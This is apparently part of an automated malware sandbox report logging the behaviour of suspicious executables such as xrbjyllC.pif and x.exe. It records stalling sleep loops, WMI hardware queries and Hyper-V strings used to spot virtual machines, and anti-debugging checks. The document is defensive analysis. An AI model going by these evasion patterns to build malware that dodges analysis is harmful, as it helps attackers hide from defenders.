                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596515s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596406s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596297s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596187s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596078s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595932s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595813s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595700s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595579s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595466s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595344s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595234s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595125s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -595016s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -594906s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -594797s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -594687s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -594578s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -594469s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -594344s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -594234s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -594125s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -28592453314249787s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599889s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599781s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599671s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599562s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599453s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599343s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599234s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599125s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -599015s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -598906s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -598796s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -598686s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -598578s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -598461s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -598310s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -598185s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -598078s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597968s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597859s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597750s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597640s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597531s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597421s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597312s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597203s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -597093s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596981s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596875s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596765s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596656s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596546s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596437s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596328s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596218s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -596109s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595999s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595890s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595781s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595671s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595562s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595453s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595343s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595234s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595125s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -595015s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -594891s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -594765s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -594656s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -594546s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456Thread sleep time: -594437s >= -30000s
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifLast function: Thread delayed
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,3_2_031C5908
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,13_2_0040128D
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,13_2_00401612
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598969Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598222Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598068Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597946Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596981Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596767Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596640Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596528Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596416Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596304Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596188Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596050Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595810Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595698Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595585Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595123Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594911Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594789Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594677Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594564Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594439Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594313Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594177Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593997Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593658Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593506Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593369Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593196Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593011Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 592620Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 592105Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 591918Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 591659Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599672
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599124
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599007
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598780
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598422
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598297
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598172
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598062
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597953
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597844
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597719
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597609
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597500
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597391
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597281
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597172
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597062
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596953
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596844
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596734
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596625
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596515
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596406
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596297
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596187
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596078
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595932
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595813
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595700
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595579
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595466
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595016
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594906
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594797
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594687
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594578
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594469
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599889
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599671
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599343
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599015
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598906
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598796
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598686
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598578
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598461
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598310
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598185
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598078
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597968
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597859
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597750
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597640
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597531
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597421
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597312
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597203
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597093
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596981
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596875
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596765
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596656
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596546
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596437
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596328
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596218
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596109
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595999
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595890
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595671
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595343
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595015
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594765
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594656
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594546
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594437
                  Source: Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
                  Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                  Source: xrbjyllC.pif, 00000009.00000003.1838900521.000000002C2A7000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887148378.000000002C2A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: xrbjyllC.pif, 00000011.00000003.2131319058.0000000025AB9000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937690735.0000000025AB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                  Source: xrbjyllC.pif, 0000000B.00000003.1970886725.000000002A373000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1970981133.000000002A383000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2040276262.000000002A370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_3-32672
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifAPI call chain: ExitProcess graph end nodegraph_9-59609
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFAPI call chain: ExitProcess graph end nodegraph_10-27319
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifAPI call chain: ExitProcess graph end nodegraph_11-57580
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFAPI call chain: ExitProcess graph end node
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,3_2_031DF744
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess queried: DebugPort
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_2_004019F0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary,3_2_031D894C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_0040ADB0 GetProcessHeap,HeapFree,9_2_0040ADB0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess token adjusted: DebugJump to behavior
